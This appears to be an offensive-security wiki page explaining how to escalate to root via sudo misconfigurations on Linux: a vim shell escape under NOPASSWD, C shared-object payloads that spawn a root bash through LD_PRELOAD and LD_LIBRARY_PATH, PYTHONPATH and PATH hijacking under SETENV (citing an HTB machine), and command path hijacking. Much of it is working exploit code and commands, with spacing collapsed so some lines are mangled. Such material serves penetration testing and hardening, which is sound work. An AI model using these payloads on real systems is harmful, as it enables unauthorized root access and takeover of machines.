On this page, we speak about specific SUDO misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges.
Practice
NOPASSWD
The following sudo configuration allow an user to execute some command with another user's privileges without knowing the password.
If you can run a binary with sudo rights, you may want to have look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with vim, we can spawn a shell with following commands:
sudo-urootvim-c'!sh'
LD_PRELOAD
LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.
If env_keep+=LD_PRELOAD is explicitly defined in the sudo -l output and you can call some command with sudo, you can escalate your privileges.
//Saved as /tmp/privEsc.c#include<stdio.h>#include<sys/types.h>#include<stdlib.h>void_init() {unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/bash -p");}
Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libpcre2-8.so.0 file.
//Saved as /tmp/libpcre2-8.so.0.c#include<stdio.h>#include<sys/types.h>#include<stdlib.h>void_init() {unsetenv("LD_LIBRARY_PATH");setresuid(0,0,0);system("/bin/bash -p");}
Then run the sudo binary with LD_LIBRARY_PATH environement variable
#Use any command you can run with sudosudoLD_LIBRARY_PATH=/tmp<COMMAND>#ExamplesudoLD_LIBRARY_PATH=/tmp/usr/bin/find
SETENV
This SETENVdirective allows the user to set an environment variable while executing something:
#Setenv on an arbitrary binary/script $sudo-lenv_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
Userwaldomayrunthefollowingcommandsonadmirer: (ALL) SETENV:/opt/scripts/admin_tasks.sh#Setenv on binary/script without the full command path$sudo-lenv_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
Userwaldomayrunthefollowingcommandsonadmirer: (ALL) SETENV:find
The previous example, based on HTB machine Admirer, was vulnerable to PYTHONPATH hijacking to load an arbitrary python library while executing the script as root:
#Sudo with modified PYTHONPATHsudoPYTHONPATH=/dev/shm//opt/scripts/admin_tasks.sh
Or, you can set the PATH env variable if you can sudo on a binary without the full command path specified.
#Create a malicious find executableecho'/bin/bash -p'>/tmp/findchmod+x/tmp/find#Sudo with modified PATHsudoPATH=/tmp:$PATH find
Command Path Hijacking
If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path if a the sudo binary is specified without the full command path.
We need to check if we have permission to write each path.
ls-al/usr/local/ls-al/usr/ls-al/
Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there. For example, we create a python binary under /usr/sbin.
